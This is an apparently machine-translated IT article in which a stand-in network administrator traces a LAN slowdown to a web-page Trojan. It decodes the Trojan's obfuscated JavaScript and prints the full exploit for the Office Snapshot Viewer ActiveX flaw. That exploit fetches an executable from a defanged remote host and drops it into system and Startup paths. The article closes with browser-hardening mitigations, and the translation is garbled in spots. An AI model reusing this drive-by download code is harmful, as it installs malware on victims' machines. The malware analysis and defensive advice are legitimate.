No patch? How to block the latest Office Vulnerabilities

Author: x140cc [X.G. C]

[IT168]My friend worked as a network administrator intern in a 3D training computer training company and went home for a few days. He found me working for him for a few days. The company is a medium-sized company. It has around 200 computers and 10 m optical fiber access via a LAN established by routers, but the network speed is surprisingly slow, each computer is equipped with an anti-virus software and an arpfirewall. The arpfirewall often prompts an attack on 192.168.1.102. It is obvious that the attack on this computer has slowed the Internet access speed due to attacks on the LAN. Each machine has nothing to do with. It mainly runs some 3D software. After locking the IP address of the computer, I found the computer and temporarily asked the person using the computer to change to my computer.

When I open IE and find that the homepage has been tampered with, an unknown webpage is often displayed, and anti-virus software and firewall cannot be opened. When I open some programs, a software error (such as being infected) is reported, which seems to be a very BT virus, it may take some time to manually kill viruses. Generally, all the viruses on the machine here are reinstalled with GHOST. It seems that this machine is also required to save time and there is no important data in it anyway. However, we have to analyze the cause of computer poisoning before reinstalling the software. Because the people here do not download any software at ordinary times, the probability of software being infected by Trojans is very low, most of them are caused by browsing the Web page.

Disconnect the local connection and find the following code on a pop-up page: Figure 1

　　

Figure 1

It seems like a Trojan. Download the webpage through another machine and use thunder to download the webpage and view a bunch of code:

　　

Figure 2

It is a webpage Trojan encrypted by a user-defined function. There is an eval function at the top of the encryption code. Change eval to document. write and save the code. Then, the page is opened directly to obtain the first decryption. Figure 3

Figure 3

1 Copy the decrypted code above, create the second webpage, and replace document. write (t) with document. getElementById ( Textfield). value = t;, enter <form id = "form1" name = "form1" method = "post" action = "">
2 < Label >
3 < Textarea name = " Textfield " Cols = " 100 " Rows = " 50 " > </ Textarea >
4 </ Label >
5 </ Form >
6

Note that textfield corresponds to textfield in document. getElementById (textfield). value = t. Then open the webpage and obtain the Final decryption result. Figure 4

Paste the complete code as follows:

1 <script type = "text/javascript">
2 function killErrors (){
3 return true;
4}
5window. onerror = killErrors;
6
7var x;
8var obj;
9var mycars = new Array ();
10 mycars [0] = "c:/Program Files/Outlook Express/wab.exe ";
11 mycars [1] = "d:/Program Files/Outlook Express/wab.exe ";
12 mycars [2] = "e:/Program Files/Outlook Express/wab.exe ";
13 mycars [3] = "C:/drivers and Settings/All Users/" start "menu/Program/start/Thunder.exe ";
14 mycars [4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe ";
15
16var objlcx = new ActiveXObject ("snpvw. Snapshot Viewer Control.1 ");
17
18if (objlcx = "[object]")
19 {
20
21 setTimeout (window. location = "ldap: //", 3000 );
22
23for (x in mycars)
24 {
25obj = new ActiveXObject ("snpvw. Snapshot Viewer Control.1 ")
26
27var buf1 = hxxp: // jijiks8ahsda.cn/9/ck.exe;
28var buf2 = mycars [x];
29
30obj. Zoom = 0;
31obj. ShowNavigationButtons = false;
32obj. AllowContextMenu = false;
33obj. SnapshotPath = buf1;
34
35try
36 {
37 obj. CompressedPath = buf2;
38 obj. PrintSnapshot ();
39
40} catch (e ){}
41
42}
43}
44
45 </script>
Http is replaced with hxxp to prevent accidental access.

Obviously, this is the code used to exploit the Microsoft Office Snapshot Viewer ActiveX vulnerability. It is an Access Vulnerability in the Office software series. The affected Access versions include 2003, 2002, and 2000, this vulnerability also exists if only the Microsoft Snapshot Viewer 10.0.4622 program is installed. It's no wonder that this vulnerability can be used in a fully-patched system. Currently, no patch is provided officially. In fact, there is no fully-patched system in the world.
The Code contains the following code:

1 mycars [0] = "c:/Program Files/Outlook Express/wab.exe ";
2 mycars [1] = "d:/Program Files/Outlook Express/wab.exe ";
3 mycars [2] = "e:/Program Files/Outlook Express/wab.exe ";
4 mycars [3] = "C:/drivers and Settings/All Users/" start "menu/Program/start/Thunder.exe ";
5 mycars [4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe ";
6. As you can see, the vulnerability user tries his best to exploit it. mycars [0] = "c:/Program Files/Outlook Express/wab.exe"; mycars [1] = "d: /Program Files/Outlook Express/wab.exe "; mycars [2] =" e:/Program Files/Outlook Express/wab.exe "; this is a method that can trigger direct execution of malicious programs, in the last two sentences, one is to write the startup item, and the other is to write the data into the self-starting system of thunder. Even if the vulnerability is not directly triggered, the program is written in the startup script, and the malicious program runs quietly after the startup. In the code, the hxxp: // jijiks8ahsda.cn/9/ck.exeworkflow contains the address of the malicious program.
Currently, the vulnerability exploitation code has been passed online, and the vulnerability update program provided by anti-virus software has not seen the official patch for this vulnerability.

After the author finishes the GHOST system, the system comes with OFFICE2003, And the hxxp: // container. This vulnerability has a very high probability of Trojans among users who have not provided security protection, and finally implements security protection for the entire LAN.

First, set the security level of IE, set the INTERNET security level to "high" on all machines, and then add the site to the restricted site to add the malicious site. Disable the COM component installation package to disable triggering of this vulnerability. This can only be solved temporarily.